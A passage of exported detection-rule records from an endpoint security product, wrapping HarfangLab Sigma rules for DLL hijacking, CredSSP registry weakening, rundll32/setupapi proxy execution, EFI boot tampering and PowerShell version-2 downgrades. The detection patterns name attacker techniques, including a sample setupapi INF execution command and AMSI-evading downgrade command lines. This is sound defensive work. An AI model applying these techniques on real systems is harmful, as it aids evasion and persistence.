"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087313Z",
"creation_date": "2026-03-23T11:45:34.087315Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087320Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoftedgecp.yml",
"content": "title: DLL Hijacking via microsoftedgecp.exe\nid: cb9fbc59-20a2-44fa-a29f-2478fa492249\ndescription: |\n Detects potential Windows DLL Hijacking via microsoftedgecp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgecp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb9fbc59-20a2-44fa-a29f-2478fa492249",
"rule_name": "DLL Hijacking via microsoftedgecp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via microsoftedgecp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cbdf5218-c8ec-48e6-b58f-9066c7358ec2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620898Z",
"creation_date": "2026-03-23T11:45:34.620900Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620905Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://support.microsoft.com/en-au/topic/credssp-updates-for-cve-2018-0886-5cbf9e5f-dc6d-744f-9e97-7ba400d6d3ea",
"https://github.com/preempt/credssp",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_credssp_vuln_allowencryptionoracle.yml",
"content": "title: CredSSP's AllowEncryptionOracle Vulnerable Value Set via Registry\nid: cbdf5218-c8ec-48e6-b58f-9066c7358ec2\ndescription: |\n Detects when CredSSP's AllowEncryptionOracle configuration is changed to a vulnerable value.\n Adversaries may change AllowEncryptionOracle to the vulnerable value (2) in order to make the server vulnerable to remote code execution.\n It is recommended to investigate this action to determine its legitimacy and to investigate any suspicious authentications.\nreferences:\n - https://support.microsoft.com/en-au/topic/credssp-updates-for-cve-2018-0886-5cbf9e5f-dc6d-744f-9e97-7ba400d6d3ea\n - https://github.com/preempt/credssp\n - https://attack.mitre.org/techniques/T1112/\ndate: 2024/04/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\CredSSP\\Parameters\\AllowEncryptionOracle'\n Details: 'DWORD (0x00000002)'\n ProcessParentImage|contains: '?'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_siemens:\n ProcessImage: 
'?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_sccm:\n ProcessParentCommandLine|startswith: '?:\\Windows\\System32\\cmd.exe /c ?:\\Windows\\ccmcache\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cbdf5218-c8ec-48e6-b58f-9066c7358ec2",
"rule_name": "CredSSP's AllowEncryptionOracle Vulnerable Value Set via Registry",
"rule_description": "Detects when CredSSP's AllowEncryptionOracle configuration is changed to a vulnerable value.\nAdversaries may change AllowEncryptionOracle to the vulnerable value (2) in order to make the server vulnerable to remote code execution.\nIt is recommended to investigate this action to determine its legitimacy and to investigate any suspicious authentications.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cbe5f82c-82e6-4a59-abdd-f95838d021f6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069323Z",
"creation_date": "2026-03-23T11:45:34.069325Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069330Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_setupapi.yml",
"content": "title: Proxy Execution via Setupapi.dll\nid: cbe5f82c-82e6-4a59-abdd-f95838d021f6\ndescription: |\n Detects a suspicious invocation of `setupapi.dll` by `rundll32.exe`.\n Adversaries may abuse `rundll32.exe` to proxy execution of malicious code. Using `rundll32.exe`, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the `rundll32.exe` process because of allowlists or false positives from normal operations.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the rundll32 process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Setupapi/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/02\nmodified: 2025/05/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Setupapi\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf\n selection_1:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_2:\n CommandLine|contains|all:\n - ' setupapi'\n - 'DefaultInstall'\n selection_3:\n CommandLine|contains:\n - 'InstallHinfSection'\n - '#238' # InstallHinfSection\n - '#239' # InstallHinfSectionA\n - '#240' # InstallHinfSectionW\n\n exclusion_nvidia:\n CommandLine|endswith: '\\NVIDIA\\3DVision\\NVSTEREO.INF'\n\n exclusion_reasonlabs:\n CommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 ?:\\Program Files\\ReasonLabs\\EPP\\x64\\rsKernelEngine.inf'\n - '?:\\WINDOWS\\system32\\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 ?:\\Program Files\\ReasonLabs\\DNS\\rsDwf.inf'\n\n 
exclusion_msi1:\n CommandLine|contains: 'rundll32.exe SetupApi.dll,InstallHinfSection DefaultInstall ??? ?:\\Program Files\\\\*.inf'\n ParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n exclusion_msi2:\n CommandLine|contains: 'rundll32.exe SetupApi.dll,InstallHinfSection DefaultInstall ??? ?:\\Program Files\\\\*.inf'\n GrandparentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_images:\n - ParentImage:\n - '?:\\Program Files\\LatencyMon\\LatMon.exe'\n - '?:\\Program Files (x86)\\Security Eye\\xvid.exe'\n - '?:\\Program Files (x86)\\Fluoplate\\dcom95.exe'\n - '?:\\Program Files (x86)\\eGambit\\das\\dasc.exe'\n - '?:\\Program Files (x86)\\Perfect IP Camera Viewer\\xvid.exe'\n - '?:\\Program Files\\Sonix\\SNFilterDriver\\DriverInstall.exe'\n - GrandparentImage:\n - '?:\\Program Files (x86)\\Cato Networks\\Cato Client\\winvpnclient.cli.exe'\n - '?:\\Program Files\\Android\\Android Studio\\bin\\studio64.exe'\n\n exclusion_revo:\n CommandLine:\n - 'rundll32.exe SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 ?:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\revoflt.inf'\n - 'rundll32.exe SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 ?:\\Program Files\\VS Revo Group\\Revo Uninstaller\\RevoProcessDetector.inf'\n\n exclusion_idm:\n CommandLine: '?:\\WINDOWS\\Sysnative\\RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 ?:\\Program Files (x86)\\Internet Download Manager\\idmwfp.inf'\n\n exclusion_rsdk:\n CommandLine|contains:\n - 'rundll32.exe setupapi,InstallHinfSection DefaultInstall.nt 0 ?:\\WINDOWS\\TEMP\\RSDK_Setup\\RSDK-SpeexACM??.inf'\n - 'rundll32.exe setupapi,InstallHinfSection DefaultInstall.nt 0 ?:\\WINDOWS\\SystemTemp\\RSDK_Setup\\RSDK-SpeexACM??.inf'\n - 'rundll32.exe setupapi,InstallHinfSection DefaultInstall.nt 0 ?:\\Users\\\\*\\AppData\\Local\\Temp\\RSDK_Setup\\RSDK-SpeexACM??.inf'\n CurrentDirectory:\n - 
'?:\\WINDOWS\\TEMP\\RSDK_Setup\\'\n - '?:\\WINDOWS\\SystemTemp\\RSDK_Setup\\'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\RSDK_Setup\\'\n\n exclusion_wireshark:\n CommandLine: '?:\\WINDOWS\\system32\\RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 .\\USBPcap.inf'\n CurrentDirectory: '?:\\Program Files\\USBPcap\\'\n\n exclusion_ndi:\n CommandLine: '?:\\WINDOWS\\system32\\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\\Codec.SpeedHQ.x??.inf'\n CurrentDirectory: '?:\\Program Files\\NDI\\NDI ? Tools\\Codec\\'\n\n exclusion_configtool:\n CommandLine: 'RUNDLL32 SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 ?:\\Users\\\\*\\AppData\\Local\\Temp\\TmpInf.inf'\n CurrentDirectory: '?:\\Program Files (x86)\\ConfigTool\\ConfigTool\\'\n\n exclusion_bridge:\n CommandLine: 'rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 ?:\\Program Files (x86)\\Bridge Master 2000\\\\*.inf'\n\n exclusion_xvid:\n CommandLine: '?:\\Windows\\System32\\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 0 ?:\\Users\\\\*\\AppData\\Local\\Temp/xvid_x??/xvid.inf'\n\n exclusion_android-studio:\n CommandLine: 'RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 .\\aehd.Inf'\n GrandparentImage|endswith: '\\bin\\studio64.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cbe5f82c-82e6-4a59-abdd-f95838d021f6",
"rule_name": "Proxy Execution via Setupapi.dll",
"rule_description": "Detects a suspicious invocation of `setupapi.dll` by `rundll32.exe`.\nAdversaries may abuse `rundll32.exe` to proxy execution of malicious code. Using `rundll32.exe`, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the `rundll32.exe` process because of allowlists or false positives from normal operations.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the rundll32 process.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-05-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cc33067b-47b1-40ff-b66f-60ab71a97745",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592407Z",
"creation_date": "2026-03-23T11:45:34.592411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592418Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vdsldr.yml",
"content": "title: DLL Hijacking via vdsldr.exe\nid: cc33067b-47b1-40ff-b66f-60ab71a97745\ndescription: |\n Detects potential Windows DLL Hijacking via vdsldr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vdsldr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\bcd.dll'\n - '\\vdsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cc33067b-47b1-40ff-b66f-60ab71a97745",
"rule_name": "DLL Hijacking via vdsldr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vdsldr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cc7bc0a7-a4e9-4f23-b8a4-772b7b15b6eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071411Z",
"creation_date": "2026-03-23T11:45:34.071414Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071418Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/",
"https://attack.mitre.org/techniques/T1542/001/"
],
"name": "t1542_001_boot_efi_file_change.yml",
"content": "title: Suspicious EFI File Modification\nid: cc7bc0a7-a4e9-4f23-b8a4-772b7b15b6eb\ndescription: |\n Detects the suspicious renaming or writing of EFI boot-related files.\n Adversaries may tamper with the Windows EFI boot files in order to disable built-in security features at boot or for persistence purposes.\n It is recommended to analyze the behavior of the process responsible for the filesystem event.\nreferences:\n - https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/\n - https://attack.mitre.org/techniques/T1542/001/\ndate: 2024/02/19\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1542.001\n - attack.t1014\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_event:\n Kind:\n - 'write'\n - 'rename'\n selection_path:\n - Path:\n - 'A:\\EFI\\Microsoft\\Boot\\bootmgfw.efi'\n - 'B:\\EFI\\Microsoft\\Boot\\bootmgfw.efi'\n - 'A:\\EFI\\Boot\\bootx64.efi'\n - 'B:\\EFI\\Boot\\bootx64.efi'\n - TargetPath:\n - 'A:\\EFI\\Microsoft\\Boot\\bootmgfw.efi'\n - 'B:\\EFI\\Microsoft\\Boot\\bootmgfw.efi'\n - 'A:\\EFI\\Boot\\bootx64.efi'\n - 'B:\\EFI\\Boot\\bootx64.efi'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_minint:\n - ProcessParentImage:\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - ProcessGrandparentImage:\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_rufus:\n ProcessName: 'rufus*.exe'\n ProcessDescription: 'Rufus'\n ProcessSignature : 'Akeo Consulting'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows 
Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSignature : 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_createmedia:\n ProcessName: 'CreateMedia.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_setuphost:\n ProcessName: 'SetupHost.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_bcdboot:\n ProcessImage: '?:\\Windows\\System32\\bcdboot.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_recoverydrive:\n Image: '?:\\Windows\\System32\\RecoveryDrive.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_7z:\n ProcessCompany: 'Igor Pavlov'\n ProcessDescription:\n - '7-Zip Console'\n - '7-Zip GUI'\n - '7-Zip File Manager'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cc7bc0a7-a4e9-4f23-b8a4-772b7b15b6eb",
"rule_name": "Suspicious EFI File Modification",
"rule_description": "Detects the suspicious renaming or writing of EFI boot-related files.\nAdversaries may tamper with the Windows EFI boot files in order to disable built-in security features at boot or for persistence purposes.\nIt is recommended to analyze the behavior of the process responsible for the filesystem event.\n",
"rule_creation_date": "2024-02-19",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1542.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cccb59b8-ff73-4c88-a42b-b858a14aea80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296250Z",
"creation_date": "2026-03-23T11:45:35.296253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gist.github.com/D3Ext/bf57673644ba08e729f65892e0dae6c4#powershell-downgrade",
"https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#Using-PowerShell-version-2",
"https://attack.mitre.org/techniques/T1562/010/"
],
"name": "t1562_010_powershell_version_downgrade.yml",
"content": "title: Downgraded PowerShell Executed\nid: cccb59b8-ff73-4c88-a42b-b858a14aea80\ndescription: |\n Detects PowerShell being executed in a version that does not support the Windows Anti-Malware Scanning Interface (AMSI) or event logging.\n Adversaries can downgrade PowerShell to a version that does not support AMSI or event logging to evade detection.\n It is recommended to examine the parent process as well as the PowerShell commands executed by the detected process to determine whether this action was legitimate.\nreferences:\n - https://gist.github.com/D3Ext/bf57673644ba08e729f65892e0dae6c4#powershell-downgrade\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#Using-PowerShell-version-2\n - https://attack.mitre.org/techniques/T1562/010/\ndate: 2025/10/06\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'powershell.exe'\n CommandLine|contains:\n - 'powershell.exe -version 2'\n - 'powershell.exe -versio 2'\n - 'powershell.exe -versi 2'\n - 'powershell.exe -vers 2'\n - 'powershell.exe -ver 2'\n - 'powershell.exe -ve 2'\n - 'powershell.exe -v 2'\n - 'powershell -version 2'\n - 'powershell -versio 2'\n - 'powershell -versi 2'\n - 'powershell -vers 2'\n - 'powershell -ver 2'\n - 'powershell -ve 2'\n - 'powershell -v 2'\n\n exclusion_scripts:\n CommandLine|contains:\n - 'NonInteractive'\n - '.ps1'\n\n exclusion_jetbrains:\n Ancestors|contains:\n - '?:\\Program Files\\JetBrains\\IntelliJ IDEA *\\bin\\idea64.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\JetBrains\\IntelliJ IDEA *\\bin\\idea64.exe'\n\n exclusion_jadx:\n Ancestors|contains:\n - '\\jadx-*\\jre\\bin\\javaw.exe|'\n - '\\Jadx Gui\\jadx-gui-*.exe|'\n\n exclusion_zabix:\n 
Ancestors|contains: '|?:\\Program Files\\zabbix_agent\\'\n\n exclusion_imagej:\n ParentImage|endswith: '\\Fiji.app\\ImageJ-win64.exe'\n\n exclusion_eclipse:\n ParentImage: '?:\\Program Files\\Eclipse Adoptium\\jdk-*-hotspot\\bin\\java.exe'\n\n exclusion_fiji:\n ParentImage|endswith: '\\fiji-windows-x64.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cccb59b8-ff73-4c88-a42b-b858a14aea80",
"rule_name": "Downgraded PowerShell Executed",
